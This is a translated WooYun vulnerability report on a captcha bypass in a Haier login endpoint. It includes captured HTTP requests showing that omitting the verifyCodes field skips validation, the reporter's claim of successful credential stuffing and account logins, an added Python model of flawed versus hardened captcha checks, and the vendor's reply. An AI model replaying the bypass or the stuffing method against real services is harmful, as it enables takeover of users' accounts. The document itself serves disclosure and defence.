
Vulnerability summary

Defect ID: wooyun-2015-0155066

Title: Design flaw in a Haier login endpoint allows bypassing the captcha and credential-stuffing site users

Vendor: Haier Group (海尔集团)

Author: 路人甲

Submitted: 2015-11-23 11:23

Fixed: 2016-01-11 15:32

Published: 2016-01-11 15:32

Vulnerability type: design flaw / logic error

Severity: low

Self-assessed Rank: 3

Status: confirmed by vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-11-23: Details sent to the vendor, awaiting vendor handling
2015-11-24: Vendor confirmed; details visible to the vendor only
2015-12-04: Details disclosed to core white-hats and domain experts
2015-12-14: Details disclosed to regular white-hats
2015-12-24: Details disclosed to intern white-hats
2016-01-11: Details disclosed to the public

Summary:

Design flaw in a Haier login endpoint allows bypassing the captcha and credential-stuffing site users

Detailed description:

http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com

1.png


This login endpoint shows no captcha at first; after a few failed attempts a captcha appears. Testing showed that the captcha can be bypassed, as follows.
Captured request:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


Delete:

&autoLogin=true&cookieTime=0.5&verifyCodes=6759&viplogin=0


Modified to:

POST /ids/cn/haier_do_loginajax.jsp HTTP/1.1
Host: testuser.haier.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/plain, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://testuser.haier.com/ids/cn/haier_login.jsp?regFrom=WishDiyProj&returnUrl=http%3A%2F%2Fmakerekam.com%2Fcallback%3Fr%3Dhttp%3A%2F%2Fmakerekam.com
Content-Length: 107
Cookie: JSESSIONID=FCC6C405642715536868425CD19AB9C9; trsidsssosessionid=6F68C80B4E7162FCFD9160CE432FC314-10.159.63.16; _gscu_1690714239=4818699272bbn213; _gscs_1690714239=48186992gp9rtt13|pv:5; _gscbrs_1690714239=1; _gscu_345248242=481869925phjju13; _gscs_345248242=48186992pb3nee13|pv:5; _gscbrs_345248242=1; _gscu_786492823=481873551f9z3020; _gscs_786492823=481873551njtve20|pv:1; _gscbrs_786492823=1; trsidssdssotoken=CFD221FAB7E56B75915109B81FEC2AB2-10.159.63.77_1448230841656
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
returnUrl=%2Fcn&userName=aaa&password=aaaaaaaaaaa


The response then says "your username or password seems to be wrong" rather than any captcha-error message, so the server never checked the captcha once the field was gone.
Username and password are transmitted in plaintext:

2.png


Credential stuffing succeeded in testing; I stopped after a few hits came out, which proves stuffing is indeed possible:

3.png


Proof of logging in to an account:

5.png


6.png


Fix recommendation:

Fix the captcha validation.
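As an added illustration that is not part of the original report and not Haier's code, the following Python models the server-side behaviour the report implies (the captcha is compared only when the client submits the verifyCodes field) next to a hardened handler that decides server-side whether a captcha is due and fails closed when the code is missing, already used, or wrong. The class and function names, the sample user store, and the threshold of three failures are assumptions made for this example.

```python
"""Captcha enforcement on a login endpoint: the flawed check beside a hardened one.

Added illustration, not Haier's code. It models the behaviour the report
describes: the server only validates the captcha when the client sends the
verifyCodes field, so a request without it is judged on credentials alone.
The hardened handler decides server-side whether a captcha is due and fails
closed when the code is missing, stale or wrong. All names and the threshold
of 3 attempts are assumptions made for this example.
"""
import hmac
import secrets
from dataclasses import dataclass
from typing import Dict, Optional

FAILURES_BEFORE_CAPTCHA = 3  # assumed; the report only says "after a few errors"

# Constructed sample user store (plaintext here only to keep the example short).
USERS = {"alice": "correct-horse"}


@dataclass
class Session:
    """Per-browser session; holds the captcha answer issued to this client."""
    captcha_answer: Optional[str] = None


class LoginService:
    def __init__(self, users: Dict[str, str], threshold: int = FAILURES_BEFORE_CAPTCHA):
        self.users = users
        self.threshold = threshold
        # Consecutive failures keyed by account and kept server-side, so that
        # discarding the cookie does not reset the counter.
        self.failures: Dict[str, int] = {}

    def issue_captcha(self, session: Session) -> str:
        """Store a fresh 4-digit code in the session (stands in for the image challenge)."""
        session.captcha_answer = f"{secrets.randbelow(10000):04d}"
        return session.captcha_answer

    def captcha_required(self, user: str) -> bool:
        return self.failures.get(user, 0) >= self.threshold

    def _password_ok(self, user: str, password: str) -> bool:
        expected = self.users.get(user)
        return expected is not None and hmac.compare_digest(expected.encode(), password.encode())

    def _record_result(self, session: Session, user: str, ok: bool) -> str:
        if ok:
            self.failures.pop(user, None)
            return "ok"
        self.failures[user] = self.failures.get(user, 0) + 1
        if self.captcha_required(user):
            self.issue_captcha(session)  # the next attempt must answer a new challenge
        return "bad_credentials"

    def login_vulnerable(self, session: Session, form: Dict[str, str]) -> str:
        """Mirrors the flaw: the code is compared only if the field is present."""
        user = form.get("userName", "")
        if "verifyCodes" in form:  # omitting the field skips this branch entirely
            if form["verifyCodes"] != session.captcha_answer:
                return "captcha_error"
        return self._record_result(session, user, self._password_ok(user, form.get("password", "")))

    def login_hardened(self, session: Session, form: Dict[str, str]) -> str:
        """The server decides whether a captcha is due; a missing or wrong code fails closed."""
        user = form.get("userName", "")
        if self.captcha_required(user):
            expected, submitted = session.captcha_answer, form.get("verifyCodes")
            session.captcha_answer = None  # single use, whatever the outcome
            if expected is None or submitted is None or not hmac.compare_digest(
                expected.encode(), submitted.encode()
            ):
                self.issue_captcha(session)
                return "captcha_error"
        return self._record_result(session, user, self._password_ok(user, form.get("password", "")))


if __name__ == "__main__":
    svc, session = LoginService(USERS), Session()
    wrong = {"userName": "alice", "password": "guess"}
    for _ in range(FAILURES_BEFORE_CAPTCHA):
        svc.login_hardened(session, wrong)
    print(svc.login_hardened(session, wrong))  # captcha_error: the code is now mandatory
    good = {"userName": "alice", "password": "correct-horse", "verifyCodes": session.captcha_answer}
    print(svc.login_hardened(session, good))  # ok
```

The two handlers differ in one decision: who says a captcha is required. In the flawed version the client does, implicitly, by including the field; in the hardened version the server consults its own failure counter, and the counter is keyed by account rather than by the cookie, so a fresh session does not reset it. Rate limiting per source address and moving the endpoint to HTTPS (the report also notes the credentials travel in plaintext) belong alongside this check rather than instead of it.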

Copyright notice: when reposting, please credit the source as 路人甲@乌云 (WooYun)


Vulnerability response

Vendor response:

Severity: medium

Vulnerability Rank: 8

Confirmed: 2015-11-24 13:33

Vendor reply:

Thanks to the WooYun white-hat for the test and the heads-up; we have assigned staff to handle it.

Latest status:

None yet